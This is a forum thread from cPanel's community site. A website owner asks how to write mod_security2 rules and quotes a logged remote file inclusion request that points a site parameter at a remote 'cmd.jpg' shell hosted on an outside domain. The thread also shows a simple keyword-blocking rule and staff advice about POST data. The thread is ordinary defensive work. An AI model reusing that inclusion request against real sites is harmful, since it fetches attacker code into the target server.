The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

HOW: Create my own mod_security2 rules?

Discussion in 'Security' started by SuperBaby, Jan 20, 2008.

  1. SuperBaby

    SuperBaby Well-Known Member

    Joined:
    Nov 27, 2003
    Messages:
    333
    Likes Received:
    0
    Trophy Points:
    166
    Location:
    Thailand
    cPanel Access Level:
    Website Owner
    Twitter:
    I checked my mod_security2 log file and see a lot of entries similar to this:

    GET /myfolder1/main.php?id=http://submitstation.de/xxxxxx/cmd.jpg

    How do I set up a mod_security2 rule so that the hacker is stopped when:

    1) He points his browser to my URL and the URL contain a specific word. In the above case, I would ban "submitstation.de".

    2) He submits a form from my site and the content contains a specific word.
     
    #1 SuperBaby, Jan 20, 2008
  2. cPDan

    cPDan cPanel Staff
    Staff Member

    Joined:
    Mar 9, 2004
    Messages:
    713
    Likes Received:
    4
    Trophy Points:
    243
    #2 cPDan, Jan 21, 2008
  3. SuperBaby

    SuperBaby Well-Known Member

    Joined:
    Nov 27, 2003
    Messages:
    333
    Likes Received:
    0
    Trophy Points:
    166
    Location:
    Thailand
    cPanel Access Level:
    Website Owner
    Twitter:
    SecRule "REQUEST_URI|QUERY_STRING" "aaa|bbb"

    I added the rule above to mod_security2. It successfully forbid the access if the URL contains aaa or bbb. But it does not prevent aaa and bbb from a submission form.
     
    #3 SuperBaby, Jan 21, 2008
  4. cPDan

    cPDan cPanel Staff
    Staff Member

    Joined:
    Mar 9, 2004
    Messages:
    713
    Likes Received:
    4
    Trophy Points:
    243
    a form, at least via POSt is not part of the URI or QUERY_STRING, your best bet is to ask the mod security folks how to filter POST requests
     
    #4 cPDan, Jan 21, 2008
  5. SuperBaby

    SuperBaby Well-Known Member

    Joined:
    Nov 27, 2003
    Messages:
    333
    Likes Received:
    0
    Trophy Points:
    166
    Location:
    Thailand
    cPanel Access Level:
    Website Owner
    Twitter:
    #5 SuperBaby, Jan 21, 2008
(You must log in or sign up to post here.)
Loading...
Similar Threads - Create mod_security2 rules
  1. abusam

    Automatically created email forwarders?

    abusam, Aug 9, 2017, in forum: E-mail Discussions
    Replies:
    8
    Views:
    101
    rpvw
    Aug 14, 2017 at 9:47 AM
  2. haulpd

    How to put RewriteRule create by Mime::add_redirect to top of .htaccess

    haulpd, Jul 27, 2017, in forum: cPanel Developers
    Replies:
    4
    Views:
    121
    haulpd
    Aug 2, 2017
  3. bluZen

    Create folders and subfolders

    bluZen, Jul 18, 2017, in forum: General Discussion
    Replies:
    4
    Views:
    86
    bluZen
    Jul 18, 2017
  4. dnavarrojr

    Can't create a downloadable profile

    dnavarrojr, Jul 11, 2017, in forum: EasyApache
    Replies:
    3
    Views:
    77
    Infopro
    Jul 12, 2017
  5. wreyes

    Create backup of multiple cPanel accounts from SSH

    wreyes, Jul 10, 2017, in forum: Data Protection
    Replies:
    2
    Views:
    152
    PlatinumServerM
    Jul 11, 2017

Share This Page